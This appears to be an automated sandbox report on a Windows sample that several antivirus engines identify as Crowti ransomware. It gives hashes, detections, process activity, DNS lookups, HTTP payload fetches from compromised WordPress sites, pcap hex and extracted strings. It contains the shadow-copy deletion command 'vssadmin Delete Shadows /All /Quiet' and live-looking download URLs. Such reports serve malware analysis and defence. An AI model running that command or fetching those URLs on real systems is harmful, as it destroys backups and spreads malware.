Analysis Date2014-11-12 20:12:45
MD5b725067c7926e8a3268d2fabfcad7b4e
SHA12518fb688bec920f49e6b20144dc385866a2a70c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: a6cd0acfe43ba0756e6a25d1eb8fab05 sha1: 1d89ee75317bbd507910f1448d944c76e46d9748 size: 8192
Section.rdata md5: d336e67b05c618199caad64856573b49 sha1: 348f2b34d6358c425cc7006c53865ebdb2db5a9c size: 4096
Section.data md5: e90cd9e813543fe0bfb6270da6dfd981 sha1: 9ba5154e74b7579784b8c58aa7f06302c9c70065 size: 4096
Section.idata md5: 5aa89d3972517cf4914e697ab1eecd49 sha1: 3e375cf2d561df36164fee6b7c3590173b19eac5 size: 4096
Section.rsrc md5: caf32995903505655ba47fa081239fe5 sha1: 4090124105678256349179941d061e4c769e308e size: 221184
Section.reloc md5: 923ac526dc4dac739bd3c3f34ce85ab0 sha1: 40c6f4d626a232002e6697e148d45f22e26bc48e size: 4096
Timestamp2014-10-28 16:24:34
VersionLegalCopyright: Copyright ? 2014
InternalName: tool
FileVersion: 1, 0, 0, 1
CompanyName:
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: tool
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: tool
OriginalFilename: tool.exe
PackerMicrosoft Visual C++ v6.0
PEhash036556770c528e4aca87dffdf88785407d1a521d
IMPhashee33aa2c30b8b2f66b18329f6ef938ed
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.1963064
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.EOCS-3091
AVAvira (antivir)TR/Crowti.A.154
AVBullGuardTrojan.GenericKD.1963064
AVCA (E-Trust Ino)Win32/Tnega.bXFbGE
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Win32.FileCoder
AVEset (nod32)Win32/Filecoder.CO
AVFortinetno_virus
AVFrisk (f-prot)W32/Trojan3.LYZ
AVF-Secureno_virus
AVGrisoft (avg)Generic_r.EGM
AVIkarusWin32.Outbreak
AVK7Trojan ( 00498ab51 )
AVKasperskyTrojan-Dropper.Win32.Injector.kvtm
AVMalwareBytesTrojan.Agent.ED
AVMcafeeRDN/Ransom!el
AVMicrosoft Security EssentialsRansom:Win32/Crowti.A
AVMicroWorld (escan)no_virus
AVNormanTrojan.GenericKD.1963064
AVRisingno_virus
AVSophosTroj/Mdrop-GIX
AVSymantecno_virus
AVTrend MicroTROJ_RANSOM.YMKB
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\a1a0cab\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdesignbytheme.com
Winsock DNSblog.marianisel.com
Winsock DNSfreekidsvideos.net
Winsock DNSvirachey.com
Winsock DNSbball-keyman.net
Winsock DNSstpaulmaybee.org
Winsock DNSwww.grekiskaforeningen.com
Winsock DNSbethpeters.net
Winsock DNSdanielferris.com.au
Winsock DNSclerktogovernors.co.uk

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSvirachey.com
Type: A
198.23.48.160
DNSblog.marianisel.com
Type: A
70.167.156.65
DNSstpaulmaybee.org
Type: A
198.23.48.88
DNSbethpeters.net
Type: A
184.154.193.178
DNSclerktogovernors.co.uk
Type: A
94.136.40.103
DNSfreekidsvideos.net
Type: A
192.252.214.226
DNSdesignbytheme.com
Type: A
174.136.39.160
DNSwww.grekiskaforeningen.com
Type: A
193.12.177.238
DNSbball-keyman.net
Type: A
203.189.105.172
DNSdanielferris.com.au
Type: A
117.55.227.125
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1032 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1033 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1034 ➝ 184.154.193.178:80
Flows TCP192.168.1.1:1035 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1036 ➝ 192.252.214.226:80
Flows TCP192.168.1.1:1037 ➝ 174.136.39.160:80
Flows TCP192.168.1.1:1038 ➝ 193.12.177.238:80
Flows TCP192.168.1.1:1039 ➝ 203.189.105.172:80
Flows TCP192.168.1.1:1040 ➝ 117.55.227.125:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a65 0d0a0d0a                     ...e....

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0a0d 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a6361 6368650d 0a0d0a0d 0a         ..cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......


Strings
(..
.o..ZS
.
?
e.
U...
7..p~
.z.;.
.
...j.

040f04e8
1, 0, 0, 1
 (C) 2008
Comments
CompanyName
Copyright ? 2014
FileDescription
FileVersion
InternalName
IPAddress1
LegalCopyright
LegalTrademarks
mychattool
 mychattool
mychattool 1.0 
 mychattool(&A)...
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
SysIPAddress32
tool
tool.exe
Translation
VarFileInfo
VS_VERSION_INFO
${*#==
0_1m1x1
(060NT\
>$>*>0>6><>B>H>N>T>Z>`>f>l>r>x>~>
080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0(C#6W
0/E+hx
0fzG	-
0o0SEg
,0R-L7^
$0-:t^
0U0Z0~0
141L1d1|1
1EuJ9G
1G%0e\V
1[G[/c
^)1laT
1mO>qk
1yquXRn
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
? ?&?,?2?8?>?D?J?P?V?\?b?h?n?t?z?
2a_ESwgH
2c3s.Y
2}>~C6{
2H2e2l2y2
2#xq^|
2-xr^8Z
.|\2z&
30:v-"
3 3$3(3,3034383<3@3D3L3P3`3|3
34J(5Sc
3!BR2)
%3iEj>+
3tDY^'
3/-U7$
 3v 4~
3ZTZzD
.}_4$++?
43eBV@-
4)4l	Aze
4_g8}1
>4o!Z.M
4U`!R\
4=$vxr9
4_W PJ
{>,52g B\
!5'A2m
]5B	It
5J.]Ekq
5&#JK#
}5-`km-ue
,>5)n*
*5p,q_
5T<lr+
5uXk~'
5W"L*b
5 .Xig{L
&,5[z9
#6CjA|F
(6]<iV2b
6~)& nE
6w!2bz
%6Y#{]
74`V.i
!78WzjD
7bji|X
7G&z[%
7&NwFO
7[ pJ"
7toxpU
{7Ue;B
%7>ZR)
^)>8?<
8/Axkv
8u&;~J%g
99@iCB
9MWJpz
9ON=G!
9o*T{Sv
9pIV?80
9{sId|H
a2]}RC
@Aad=I
AAW-c?
_acmdln
_adjust_fdiv
Adobe ImageReadyq
a )D	X
A|e_t. 
_!<[aGL
*AH!kxb
a!$@i~
AppendMenuA
A,tdj%e
A	wzQJe
-az8#cO
	B	BRB
\b@c&s
>BF0t9& 
bJ<}FV
BL9YiJ<`R
b?nu'hY
B Q!YPmB
BTBdB 
b%?t&R
BUp70i/
BWB'B[
%BxxU;
+C1{6|
\C1BwB
c8k-|5
c9qUwt
c&b4:"7
Cd`uI.
cfEbse
CloseHandle
_controlfp
Cp3<;!
Cpc2/04
CreateFileW
CreateThread
c}sRz/
CT_)Tw<
(cU4gC
%cu(lO
cVv("CF
c]w7*^
CXQOmN
__CxxFrameHandler
D21z9O
*D5t'%
@.data
dBYBiB
D)@$,D
Di,56"
di"f8/
(D}j>(
D=j8#Q
__dllonexit
DM$8A{
dPx@	5
DrawIcon
D)!uJJ#
dXs=$+
e5E{\K
'E5xeL
&E969^So
>/E^BN
E@!cN+
eddz|ZN
ef:instanceID="xmp.iid:7E16CEE7DFE411E3A6D191596DE02B73" stRef:documentID="xmp.did:7E16CEE8DFE411E3A6D191596DE02B73"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
E|FJB;Bk
ei''q#
!EJF	Y
eM0~;NR4=
EnableWindow
ep$#?g
\er@V*
_except_handler3
Ez3A_-c{FS
F1-n51
fclose
\f?"d)
FEBrB;4Z
f>F%LV
f/<Kd)
fKPsD*d
$F[LW]
?foSDcW-
fq0bJ$1
{fqfIk
Ft6Hwi
F.v.id
f:XBze5W^+U0j#b
|fXr<Z
.G3`/'
g3O@0F
gb%+oE<V 
GetClientRect
GetCurrentProcessId
__getmainargs
GetModuleFileNameExW
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetSystemMenu
GetSystemMetrics
}GjH_rn
G/N<*	e
<g	%/y
g>=&YU-
gz{H8A9
	GzxY!h
&%@)^h
h,[3b	4
H-Bk>dS 
H/C416sh
~H?g~?
&Hl5HA
HrCg@b	g 
h=rMbU
hvM[F<
.\'HW\+k
H zHhN?
^<i6HUg
.idata
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:7E16CEE9DFE411E3A6D191596DE02B73" xmpMM:DocumentID="xmp.did:7E16CEEADFE411E3A6D191596DE02B73"> <xmpMM:DerivedFrom st
iEUH99
if.3X*
i,f&M)
)ILm?]
_initterm
;'I=o~8
$]I|Pn
i?pU{R
IsIconic
IS`|Lmn
"iTXtXML:com.adobe.xmp
#]^'.j
j/%B5O}
JGN3a#W
Jhraxy?r
jLK484
$jlXa-1
Jna(h@
/JP<&j
j^^^rrrRRRvvv
jw M5/
JW'X-e%
\k1#(V
K@2r)b
k$ByEV
kernel32.dll
KERNEL32.dll
kGBNw-L\
k|m&q]
|k(N_X+
K}	Qhc
`kRhRa
k "r=K
krPq]\&"u&DK
kX"wnd&m
L.	+0DZzc\y
%l1t% n/TD
|lbEzKq
<L!Bs=
]@_*lc
l*edep
%lEn}D
+LE,w"
_/lir	
*\":LM3d
LnVTpjH=
LoadIconA
LoadLibraryA
loT^LQ
l){s4_
{|$L<u
LwI(YJ{g
L'\,y-
~=l)z!bB?Z
m9h63q
mA.[QW
MFC42.DLL
{mf>+M
<mGku7
mksoxJ
_M}qN~|
ms%N/cQ%2D
MSVCRT.dll
^_:mVm
MZa'w6[R
n6sLm$
n7@+d,
]NAT%-
.n]chcz(
n	#|EW
.n:HnD
niUz:~
NJu<JN;
n<MLN'
#n.n:K+
no}y^Y
np^~SV;]^-
N%,^qJ
n`rY#0o
NsAHD}
nVY*[$i
&Nz?01r
O0@yl#
O7U[V}0
oBs;DV
Oeyj'U0
Og\yV{i
Ohq|ShP
Ok(U})s
_onexit
(oo2ny
o?P%BfH
OpenProcess
oU3_5=*
OuznQ7
ov1N:}
(O;WsCk
OXI%^G
P0j+(o
p0Jwo-r
P0P0P0
P2L?(2
#p4@(z
P6N]lXfR
P6wV%K;!:
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADD